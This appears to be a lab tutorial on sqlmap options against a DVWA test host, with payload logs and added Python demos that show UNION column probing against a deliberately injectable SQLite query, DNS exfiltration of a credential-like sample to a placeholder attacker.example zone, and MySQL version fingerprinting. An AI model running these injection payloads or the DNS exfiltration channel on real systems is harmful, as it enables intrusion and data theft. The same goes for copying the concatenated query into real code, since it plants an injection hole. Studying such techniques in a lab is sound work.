Specifying the injection technique

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique="BEUSTQ" 

B: Boolean-based blind injection

E: Error-based injection

U: UNION query injection

S: Stacked queries injection

T: Time-based blind injection

Q: Inline query injection

By default all techniques are used, which is the same as --technique="BEUSTQ". Restricting the set (for example --technique=U) only skips the tests for the other techniques, so narrow it once you already know which one works on the target.

Time-based blind injection parameter

--time-sec: the delay, in seconds, that sqlmap asks the DBMS to sleep for in time-based blind tests (default 5). Lowering it speeds up extraction, but sqlmap decides true/false by measuring the response delay, so a value smaller than the link's own jitter produces false positives.

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique=T --time-sec=1 

UNION injection parameters

--union-cols: the range of column counts to try for UNION injection; the default is 1-10. A higher --level widens the range (up to 50 columns), but --union-cols pins it to exactly the range you give. For example, to test UNION with 12-18 columns:

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-cols="12-18"

--union-char: the value sqlmap puts in every column of the injected UNION SELECT while probing; the default is NULL. At higher --level values sqlmap also tries a random integer, because there are cases where the NULL-based UNION test fails and an integer succeeds. For example, to use "123" as the union character:

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-char="123" -v 3

With 123 as the union character, the default range of 1-10 columns is probed (-v 3 prints every payload):

[22:19:32] [PAYLOAD] -9103) ORDER BY 1-- JliU
[22:19:32] [PAYLOAD] -6117) ORDER BY 4864-- XFDV
[22:19:32] [PAYLOAD] -5546) UNION ALL SELECT 123-- ueOQ
[22:19:32] [PAYLOAD] -8136) UNION ALL SELECT 123,123-- ksax
[22:19:33] [PAYLOAD] -6350) UNION ALL SELECT 123,123,123-- UHzH
[22:19:33] [PAYLOAD] -4218) UNION ALL SELECT 123,123,123,123-- rbVp
[22:19:33] [PAYLOAD] -1370) UNION ALL SELECT 123,123,123,123,123-- iprn
[22:19:33] [PAYLOAD] -5507) UNION ALL SELECT 123,123,123,123,123,123-- Inhq
[22:19:33] [PAYLOAD] -9862) UNION ALL SELECT 123,123,123,123,123,123,123-- IwGO
[22:19:33] [PAYLOAD] -5351) UNION ALL SELECT 123,123,123,123,123,123,123,123-- EdWF
[22:19:33] [PAYLOAD] -3384) UNION ALL SELECT 123,123,123,123,123,123,123,123,123-- ThkG
[22:19:33] [PAYLOAD] -6285) UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123-- vyBV

--union-from: the table to put in the FROM clause of the injected UNION SELECT, needed where a SELECT with no FROM clause is not accepted (Oracle, for instance). For example, to use the users table:

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-from="users" -v 3

The default union character NULL and the default 1-10 column range are used, with FROM users appended to every UNION payload. The "reflective value(s) found" warning means the injected value was echoed back in the response; sqlmap filters such reflections out before comparing pages so they do not skew the true/false decision.

[22:27:16] [PAYLOAD] 1) ORDER BY 1-- Vrdu
[22:27:16] [WARNING] reflective value(s) found and filtering out
[22:27:16] [PAYLOAD] 1) ORDER BY 6196-- MvfX
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL FROM users-- cmox
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL FROM users-- FwKo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL FROM users-- fmaB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL FROM users-- MuVY
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL FROM users-- Wijp
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL FROM users-- wYUU
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- rWYB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LvGo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LnTt
[22:27:17] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- YGVF
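The three UNION options above all change the same probe loop: sqlmap sends UNION ALL SELECT with n copies of the union character for each n in the column range, optionally with a FROM clause, and watches for the response to change. The following Python is an added example (not sqlmap's code and not from the original page) that reproduces that loop, plus the ORDER BY binary search seen at the top of the logs, against a constructed in-memory SQLite stand-in for DVWA's users table. The VulnerableApp class, its query shape (the id is wrapped in parentheses, which is why the payloads start with ")" like the ones in the log) and the sample rows are all assumptions made for the demonstration.

```python
import random
import sqlite3

UNION_COLS = (1, 10)  # sqlmap's default --union-cols range


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for DVWA's users table (sample rows, not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(user_id INTEGER, first_name TEXT, last_name TEXT, "
                 "user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?)", [
        (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
        (2, "Gordon", "Brown", "gordonb", "e99a18c4428cb38d5f260853678922e0"),
    ])
    return conn


class VulnerableApp:
    """Hypothetical page: the id parameter is concatenated into the query (deliberately
    vulnerable), and the query wraps it in parentheses, so payloads begin with ')'."""

    def __init__(self, conn: sqlite3.Connection):
        self.conn = conn

    def page(self, id_param: str):
        sql = "SELECT first_name, last_name FROM users WHERE (user_id = %s)" % id_param
        try:
            return self.conn.execute(sql).fetchall()
        except sqlite3.Error:
            return None  # the application shows a generic error page


def order_by_count(app: VulnerableApp, upper: int = 50):
    """ORDER BY n errors once n exceeds the number of selected columns, so the
    boundary can be found by binary search instead of trying every count."""
    def ok(n: int) -> bool:
        return app.page("-9103) ORDER BY %d-- x" % n) is not None

    if not ok(1) or ok(upper):
        return None  # ORDER BY not usable here; fall back to brute force
    lo, hi = 1, upper
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if ok(mid):
            lo = mid
        else:
            hi = mid - 1
    return lo


def union_count(app: VulnerableApp, cols=UNION_COLS, char: str = "NULL", from_table=None):
    """Brute force like sqlmap: UNION ALL SELECT with n copies of `char` for each n in
    `cols` (--union-cols / --union-char), optionally with a FROM clause (--union-from).
    A random negative id keeps the original query from matching any row, so anything
    that comes back was produced by the UNION part."""
    from_clause = " FROM %s" % from_table if from_table else ""
    for n in range(cols[0], cols[1] + 1):
        payload = "-%d) UNION ALL SELECT %s%s-- x" % (
            random.randint(1000, 9999), ",".join([char] * n), from_clause)
        rows = app.page(payload)
        if not rows:
            continue  # error (wrong column count) or empty page: keep probing
        if char == "NULL" and all(v is None for v in rows[0]):
            return n, payload
        if char != "NULL" and all(str(v) == char for v in rows[0]):
            return n, payload  # marker reflected in the page: column count found
    return None, None


if __name__ == "__main__":
    app = VulnerableApp(build_db())
    print("ORDER BY      :", order_by_count(app))
    print("NULL          :", union_count(app))
    print("char 123      :", union_count(app, char="123"))
    print("from users    :", union_count(app, from_table="users"))
    print("cols 12-18    :", union_count(app, cols=(12, 18)))
```

The last call shows the practical point of --union-cols: the constructed query has two columns, so pinning the range to 12-18 (as in the command above) finds nothing, while any range containing 2 succeeds with NULL, with 123 and with FROM users alike.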

DNS exfiltration attack

--dns-domain: retrieves data over DNS instead of through the HTTP response. sqlmap makes the DBMS resolve hostnames of the form <data>.<your domain>, and a DNS server that sqlmap itself starts on the attacking machine records the queried names. Requirements: you must control a domain whose authoritative name server is the host running sqlmap, sqlmap must run as root so it can bind UDP port 53 on that host, and the DBMS must be able to trigger outbound DNS lookups (for example LOAD_FILE with a UNC path on MySQL under Windows, xp_dirtree on Microsoft SQL Server, UTL_INADDR on Oracle). The port 53 that has to be reachable is the attacker's, not the target's, and the argument is your own domain, not the target URL:

sqlmap -u "target URL" --dns-domain="your-domain.example"
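What travels over that channel is a hostname built from the stolen bytes, and what the listener on port 53 has to do is parse the question section of each incoming query and decode the name. The Python below is an added example of that principle, not sqlmap's own DNS server and not from the original page: it hex-encodes data into DNS labels under an assumed attacker-controlled zone (attacker.example, a placeholder), builds the raw query packet the DBMS host's resolver would send, and decodes it the way the attacker's server would. The label size and the zone name are assumptions; the secret used in the usage is a constructed sample.

```python
import struct

# Constructed placeholder: a zone whose authoritative name server the attacker runs.
EXFIL_DOMAIN = "attacker.example"


def encode_exfil(data: bytes, domain: str = EXFIL_DOMAIN, label_len: int = 62) -> str:
    """Hex-encode the stolen bytes and split them into DNS labels (63 chars max each)."""
    hexed = data.hex()
    labels = [hexed[i:i + label_len] for i in range(0, len(hexed), label_len)]
    qname = ".".join(labels + [domain])
    if len(qname) > 253:  # DNS name length limit: exfiltrate in smaller chunks instead
        raise ValueError("name too long, split the data into smaller chunks")
    return qname


def build_dns_query(qname: str, txid: int = 0x1234) -> bytes:
    """Minimal standard A query, i.e. what the DBMS host's resolver sends out."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD set, 1 question
    question = b"".join(bytes([len(label)]) + label.encode("ascii")
                        for label in qname.split("."))
    return header + question + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_qname(packet: bytes) -> str:
    """What the listener on UDP/53 does: walk the question section and rebuild the name."""
    labels, pos = [], 12  # the question starts right after the 12-byte header
    while True:
        length = packet[pos]
        if length == 0:
            break
        if length & 0xC0:  # compression pointers never appear in a query name
            raise ValueError("unexpected compression pointer in question")
        pos += 1
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    return ".".join(labels)


def decode_exfil(qname: str, domain: str = EXFIL_DOMAIN) -> bytes:
    """Strip the zone suffix, rejoin the hex labels and decode; reject names outside the zone."""
    suffix = "." + domain.lower()
    if not qname.lower().endswith(suffix):
        raise ValueError("not an exfiltration query for %s" % domain)
    return bytes.fromhex(qname[:-len(suffix)].replace(".", ""))


def round_trip(secret: bytes) -> bytes:
    """Simulate the whole channel: the DBMS resolves the crafted name, our server decodes it."""
    packet = build_dns_query(encode_exfil(secret))
    return decode_exfil(parse_qname(packet))


if __name__ == "__main__":
    sample = b"admin:5f4dcc3b5aa765d61d8327deb882cf99"  # constructed sample row
    print(encode_exfil(sample))
    print(round_trip(sample))
```

Two things the code makes visible: the data is hex-encoded because DNS labels cannot carry arbitrary bytes, and the channel works even when the target's firewall blocks everything except DNS, because the query reaches the attacker through the target's own recursive resolver rather than directly.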

Getting the database fingerprint

-f or --fingerprint: perform an extensive DBMS version fingerprint instead of only identifying the DBMS family.

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=8jh3juigrkaqipeu1oiinhcpbi; security=low" -f

From the output below, the back-end DBMS is MySQL. The active fingerprint alone only places it at >= 5.7; the comment-injection fingerprint (testing which /*!NNNNN ... */ versioned comments the server executes) narrows it to 5.7.26, and the HTML error message only confirms the MySQL family:

[20:15:10] [INFO] testing MySQL
[20:15:10] [INFO] confirming MySQL
[20:15:11] [INFO] the back-end DBMS is MySQL
[20:15:11] [INFO] actively fingerprinting MySQL
[20:15:11] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.26
               html error message fingerprint: MySQL
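The comment-injection fingerprint works because MySQL executes the body of a versioned comment /*!NNNNN ... */ only when the server version, encoded as major*10000 + minor*100 + patch, is at least NNNNN, and otherwise treats it as an ordinary comment. The Python below is an added example (not sqlmap's code, which lives in its MySQL fingerprint plugin, and not from the original page) that simulates a MySQL server with that rule and recovers its version through a boolean oracle alone, by binary search over a candidate list. The SimulatedMySQL class, the candidate versions and the probe shape 1=1/*!NNNNN AND 1=2*/ are constructed for the demonstration.

```python
import re

# Assumed candidate list; sqlmap carries a much longer table of released versions.
CANDIDATES = ["5.0.96", "5.1.73", "5.5.62", "5.6.51", "5.7.26", "5.7.44", "8.0.36"]


def version_to_int(version: str) -> int:
    """MySQL's versioned-comment encoding: 5.7.26 -> 50726."""
    major, minor, patch = (int(x) for x in version.split("."))
    return major * 10000 + minor * 100 + patch


class SimulatedMySQL:
    """Stand-in for the target's MySQL (constructed): applies the versioned-comment rule
    to a boolean condition and reports whether the page would show its row. A real
    target gives the same bit by showing or hiding content in the HTTP response."""
    COMMENT = re.compile(r"^(?P<left>.*?)/\*!(?P<ver>\d{5})(?P<body>.*?)\*/$")

    def __init__(self, version: str):
        self.version = version_to_int(version)

    def is_true(self, condition: str) -> bool:
        m = self.COMMENT.match(condition)
        if m:
            condition = m.group("left")
            if self.version >= int(m.group("ver")):
                condition += m.group("body")  # comment body executed only on new enough servers
        # Evaluate "a=b AND c=d" style conditions only.
        return all(int(l) == int(r)
                   for l, r in (term.split("=") for term in condition.split(" AND ")))


def older_than(target: SimulatedMySQL, version: str) -> bool:
    """True iff the server is older than `version`: the AND 1=2 inside the versioned
    comment runs (and makes the condition false) only on servers >= version."""
    return target.is_true("1=1/*!%05d AND 1=2*/" % version_to_int(version))


def comment_fingerprint(target: SimulatedMySQL, candidates=CANDIDATES):
    """Binary search for the highest candidate the server is not older than."""
    cands = sorted(candidates, key=version_to_int)
    if older_than(target, cands[0]):
        return None  # older than anything on the list
    lo, hi = 0, len(cands) - 1
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if older_than(target, cands[mid]):
            hi = mid - 1
        else:
            lo = mid
    return cands[lo]


if __name__ == "__main__":
    print(comment_fingerprint(SimulatedMySQL("5.7.26")))
```

The resolution is only as fine as the candidate list: a server running 5.7.30 would also be reported as 5.7.26 here, which is why sqlmap's own table is kept current. When UNION or error-based injection is available, reading @@version directly is faster; the comment trick matters precisely when only a boolean oracle exists.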
12-20 20:32